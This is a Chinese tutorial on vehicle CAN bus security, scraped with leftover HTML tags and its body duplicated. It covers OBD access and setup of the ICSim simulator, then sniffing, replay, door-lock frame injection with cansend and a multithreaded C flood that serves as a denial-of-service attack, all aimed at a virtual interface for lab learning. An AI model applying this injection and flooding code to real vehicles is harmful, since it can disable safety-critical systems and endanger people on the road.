车辆CAN总线安全教学文档<\/h1>

1. CAN总线简介<\/h2>
CAN总线(Controller Area Network)是一种广泛应用于汽车、工业控制和其他领域的串行通信协议。由德国Bosch公司于1986年开发，1987年正式发布。<\/p>

1.1 应用领域<\/h3>

汽车电子控制单元(ECU)间通信：引擎控制、刹车系统、仪表盘等<\/li>

工业自动化、机器人技术、医疗设备等分布式控制系统<\/li> <\/ul>

1.2 总线优势<\/h3>

替代传统点对点布线系统，减少线路复杂度<\/li>
降低维护成本<\/li>

提高通信效率<\/li> <\/ul>

2. CAN总线接入方式<\/h2>

2.1 OBD接口接入<\/h3>

位置：通常位于前排乘客或驾驶员座位附近<\/li>
相关引脚：6号(CAN高电平)和14号(CAN低电平)<\/li>

连接工具：专用CAN总线分析工具<\/li> <\/ul>

2.2 其他接入方式<\/h3>

破线接入：通过物理破坏线束接入<\/li>

车内零部件控制：通过已攻克的零部件间接接入<\/li> <\/ul>

3. 实验环境搭建<\/h2>

3.1 所需工具<\/h3>

Linux系统(推荐Kali Linux)<\/li>
ICSim模拟器<\/li>
can-utils工具集<\/li>
socketcand<\/li>

CAN分析工具(SavvyCAN或Kayak)<\/li> <\/ul>

3.2 ICSim安装<\/h3>

git clone https:\/\/github.com\/zombieCraig\/ICSim.git
<\/span><\/span>cd ICSim
<\/span><\/span>sudo apt install libsdl2-dev libsdl2-image-dev can-utils maven autoconf -y
<\/span><\/span>sudo make
<\/span><\/span><\/code><\/pre>3.3 can-utils安装<\/h3>
sudo apt-get install can-utils
<\/span><\/span><\/code><\/pre>3.4 socketcand安装<\/h3>
git clone https:\/\/github.com\/linux-can\/socketcand.git
<\/span><\/span>cd socketcand
<\/span><\/span>wget https:\/\/raw.githubusercontent.com\/dschanoeh\/socketcand\/master\/config.h.in
<\/span><\/span>autoconf
<\/span><\/span>.\/configure
<\/span><\/span>make clean
<\/span><\/span>make
<\/span><\/span>sudo make install
<\/span><\/span><\/code><\/pre>3.5 SavvyCAN安装<\/h3>
wget https:\/\/github.com\/collin80\/SavvyCAN\/releases\/download\/continuous\/SavvyCAN-1999da8-x86_64.AppImage
<\/span><\/span>chmod 777<\/span> SavvyCAN-1999da8-x86_64.AppImage
<\/span><\/span>.\/SavvyCAN-044fea3-x86_64.AppImage
<\/span><\/span><\/code><\/pre>3.6 启动ICSim<\/h3>
.\/setup_vcan.sh  # 初始化虚拟CAN接口<\/span>
<\/span><\/span>.\/icsim vcan0    # 启动仪表盘模拟器<\/span>
<\/span><\/span>.\/controls vcan0 # 启动控制面板<\/span>
<\/span><\/span><\/code><\/pre>4. CAN总线基本操作<\/h2>
4.1 控制面板操作<\/h3>



功能<\/th>
按键<\/th>
<\/tr>
<\/thead>


加速<\/td>
上方向键<\/td>
<\/tr>

左转向<\/td>
左方向键<\/td>
<\/tr>

右转向<\/td>
右方向键<\/td>
<\/tr>

开\/关左前车门锁<\/td>
右\/左shift+A<\/td>
<\/tr>

开\/关右前车门锁<\/td>
右\/左shift+B<\/td>
<\/tr>

开\/关左后车门锁<\/td>
右\/左shift+X<\/td>
<\/tr>

开\/关右后车门锁<\/td>
右\/左shift+Y<\/td>
<\/tr>

开启所有车门锁<\/td>
左shift+右shift<\/td>
<\/tr>

关闭所有车门锁<\/td>
右shift+左shift<\/td>
<\/tr>
<\/tbody>
<\/table>
4.2 CAN流量监听<\/h3>
4.2.1 使用can-utils<\/h4>
candump -l vcan0  # 记录到文件<\/span>
<\/span><\/span>candump vcan0     # 实时显示<\/span>
<\/span><\/span><\/code><\/pre>数据格式：(时间戳) 接口 仲裁ID#数据<\/code><\/p>
4.2.2 使用cansniffer<\/h4>
cansniffer -c vcan0
<\/span><\/span><\/code><\/pre>变化的数据会以红色显示<\/p>
4.2.3 使用Wireshark<\/h4>
直接监听vcan0接口<\/p>
4.2.4 使用SavvyCAN<\/h4>

Connection -> Open Connection Window<\/li>
Add New Device Connection<\/li>
选择QT SerialBus Devices<\/li>
SerialBus Devices选择socketcan<\/li>
Port选择vcan0<\/li>
<\/ol>
4.3 CAN流量重放<\/h3>
canplayer -I 日志文件.log
<\/span><\/span><\/code><\/pre>4.4 消息逆向<\/h3>
通过观察法确定仲裁ID对应功能：<\/p>

在SavvyCAN中观察所有活跃ID<\/li>
执行特定操作(如踩油门)<\/li>
观察哪些ID的数据随之变化<\/li>
重复操作缩小范围，确定具体ID<\/li>
<\/ol>
4.5 发送CAN消息<\/h3>
cansend vcan0 244#0000003894
<\/span><\/span><\/code><\/pre>持续发送示例(Python)：<\/p>
import<\/span> os
<\/span><\/span>import<\/span> time
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    os.<\/span>system("cansend vcan0 244#0000003894"<\/span>)
<\/span><\/span>    time.<\/span>sleep(1<\/span>)
<\/span><\/span><\/code><\/pre>5. CAN总线攻击技术<\/h2>
5.1 DOS攻击原理<\/h3>
利用CAN总线基于优先级的仲裁机制，通过发送高优先级消息使其他消息无法响应<\/p>
5.2 手动DOS攻击<\/h3>

确定低优先级操作：<\/li>
<\/ol>
cansend vcan0 19B#00000E000000  # 开车门<\/span>
<\/span><\/span>cansend vcan0 19B#00000F000000  # 关车门<\/span>
<\/span><\/span><\/code><\/pre>
发送高优先级消息干扰：<\/li>
<\/ol>
cansend vcan0 188#01000000  # 左转向灯(高优先级)<\/span>
<\/span><\/span><\/code><\/pre>5.3 多线程DOS攻击(C语言)<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <pthread.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> *<\/span>send_message<\/span>(void<\/span> *<\/span>arg) {
<\/span><\/span>    while<\/span>(1<\/span>) {
<\/span><\/span>        system("cansend vcan0 188#01000000"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> NULL;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    pthread_t threads[100<\/span>];
<\/span><\/span>    for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> 100<\/span>; i++<\/span>) {
<\/span><\/span>        pthread_create(&<\/span>threads[i], NULL, send_message, NULL);
<\/span><\/span>    }
<\/span><\/span>    while<\/span>(1<\/span>) {
<\/span><\/span>        sleep(1<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译运行：<\/p>
gcc -o attack main.c -pthread
<\/span><\/span>.\/attack
<\/span><\/span><\/code><\/pre>5.4 FUZZ攻击<\/h3>
通过发送特定CAN数据帧使车内零部件崩溃或发出警报：<\/p>

需要实际接入车辆测试<\/li>
不断修改数据帧进行测试<\/li>
观察系统反应<\/li>
<\/ol>
6. 防御措施<\/h2>

CAN总线入侵检测系统<\/li>
消息认证机制<\/li>
加密通信<\/li>
防火墙隔离关键ECU<\/li>
速率限制和异常检测<\/li>
<\/ol>
7. 参考资源<\/h2>

ICSim GitHub<\/a><\/li>
can-utils GitHub<\/a><\/li>
socketcand GitHub<\/a><\/li>
SavvyCAN官方网站<\/a><\/li>
汽车CAN总线安全研究论文<\/a><\/li>
<\/ol>

本教学文档详细介绍了CAN总线的基本概念、实验环境搭建、基本操作和安全测试技术，涵盖了从入门到实战的完整内容。通过ICSim模拟器，安全研究人员可以在不接触真实车辆的情况下学习和实践CAN总线安全技术。<\/p>

功能<\/th>	按键<\/th> <\/tr> <\/thead>
加速<\/td>	上方向键<\/td> <\/tr>
左转向<\/td>	左方向键<\/td> <\/tr>
右转向<\/td>	右方向键<\/td> <\/tr>
开\/关左前车门锁<\/td>	右\/左shift+A<\/td> <\/tr>
开\/关右前车门锁<\/td>	右\/左shift+B<\/td> <\/tr>
开\/关左后车门锁<\/td>	右\/左shift+X<\/td> <\/tr>
开\/关右后车门锁<\/td>	右\/左shift+Y<\/td> <\/tr>
开启所有车门锁<\/td>	左shift+右shift<\/td> <\/tr>
关闭所有车门锁<\/td>	右shift+左shift<\/td> <\/tr> <\/tbody> <\/table> 4.2 CAN流量监听<\/h3> 4.2.1 使用can-utils<\/h4> candump -l vcan0 # 记录到文件<\/span> <\/span><\/span>candump vcan0 # 实时显示<\/span> <\/span><\/span><\/code><\/pre>数据格式：(时间戳) 接口仲裁ID#数据<\/code><\/p> 4.2.2 使用cansniffer<\/h4> cansniffer -c vcan0 <\/span><\/span><\/code><\/pre>变化的数据会以红色显示<\/p> 4.2.3 使用Wireshark<\/h4> 直接监听vcan0接口<\/p> 4.2.4 使用SavvyCAN<\/h4> Connection -> Open Connection Window<\/li> Add New Device Connection<\/li> 选择QT SerialBus Devices<\/li> SerialBus Devices选择socketcan<\/li> Port选择vcan0<\/li> <\/ol> 4.3 CAN流量重放<\/h3> canplayer -I 日志文件.log <\/span><\/span><\/code><\/pre>4.4 消息逆向<\/h3> 通过观察法确定仲裁ID对应功能：<\/p> 在SavvyCAN中观察所有活跃ID<\/li> 执行特定操作(如踩油门)<\/li> 观察哪些ID的数据随之变化<\/li> 重复操作缩小范围，确定具体ID<\/li> <\/ol> 4.5 发送CAN消息<\/h3> cansend vcan0 244#0000003894 <\/span><\/span><\/code><\/pre>持续发送示例(Python)：<\/p> import<\/span> os <\/span><\/span>import<\/span> time <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> os.<\/span>system("cansend vcan0 244#0000003894"<\/span>) <\/span><\/span> time.<\/span>sleep(1<\/span>) <\/span><\/span><\/code><\/pre>5. CAN总线攻击技术<\/h2> 5.1 DOS攻击原理<\/h3> 利用CAN总线基于优先级的仲裁机制，通过发送高优先级消息使其他消息无法响应<\/p> 5.2 手动DOS攻击<\/h3> 确定低优先级操作：<\/li> <\/ol> cansend vcan0 19B#00000E000000 # 开车门<\/span> <\/span><\/span>cansend vcan0 19B#00000F000000 # 关车门<\/span> <\/span><\/span><\/code><\/pre> 发送高优先级消息干扰：<\/li> <\/ol> cansend vcan0 188#01000000 # 左转向灯(高优先级)<\/span> <\/span><\/span><\/code><\/pre>5.3 多线程DOS攻击(C语言)<\/h3> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span>#include<\/span> <pthread.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> <\/span>send_message<\/span>(void<\/span> <\/span>arg) { <\/span><\/span> while<\/span>(1<\/span>) { <\/span><\/span> system("cansend vcan0 188#01000000"<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> NULL; <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> pthread_t threads[100<\/span>]; <\/span><\/span> for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> 100<\/span>; i++<\/span>) { <\/span><\/span> pthread_create(&<\/span>threads[i], NULL, send_message, NULL); <\/span><\/span> } <\/span><\/span> while<\/span>(1<\/span>) { <\/span><\/span> sleep(1<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>编译运行：<\/p> gcc -o attack main.c -pthread <\/span><\/span>.\/attack <\/span><\/span><\/code><\/pre>5.4 FUZZ攻击<\/h3> 通过发送特定CAN数据帧使车内零部件崩溃或发出警报：<\/p> 需要实际接入车辆测试<\/li> 不断修改数据帧进行测试<\/li> 观察系统反应<\/li> <\/ol> 6. 防御措施<\/h2> CAN总线入侵检测系统<\/li> 消息认证机制<\/li> 加密通信<\/li> 防火墙隔离关键ECU<\/li> 速率限制和异常检测<\/li> <\/ol> 7. 参考资源<\/h2> ICSim GitHub<\/a><\/li> can-utils GitHub<\/a><\/li> socketcand GitHub<\/a><\/li> SavvyCAN官方网站<\/a><\/li> 汽车CAN总线安全研究论文<\/a><\/li> <\/ol> 本教学文档详细介绍了CAN总线的基本概念、实验环境搭建、基本操作和安全测试技术，涵盖了从入门到实战的完整内容。通过ICSim模拟器，安全研究人员可以在不接触真实车辆的情况下学习和实践CAN总线安全技术。<\/p>

车辆CAN总线安全教学文档<\/h1>

1. CAN总线简介<\/h2> CAN总线(Controller Area Network)是一种广泛应用于汽车、工业控制和其他领域的串行通信协议。由德国Bosch公司于1986年开发，1987年正式发布。<\/p>

2. CAN总线接入方式<\/h2>

3. 实验环境搭建<\/h2>

4. CAN总线基本操作<\/h2>

4.2 CAN流量监听<\/h3>

4.2.3 使用Wireshark<\/h4> 直接监听vcan0接口<\/p>

5. CAN总线攻击技术<\/h2>

5.1 DOS攻击原理<\/h3> 利用CAN总线基于优先级的仲裁机制，通过发送高优先级消息使其他消息无法响应<\/p>

1. CAN总线简介<\/h2>
CAN总线(Controller Area Network)是一种广泛应用于汽车、工业控制和其他领域的串行通信协议。由德国Bosch公司于1986年开发，1987年正式发布。<\/p>

4.2.3 使用Wireshark<\/h4>
直接监听vcan0接口<\/p>

5.1 DOS攻击原理<\/h3>
利用CAN总线基于优先级的仲裁机制，通过发送高优先级消息使其他消息无法响应<\/p>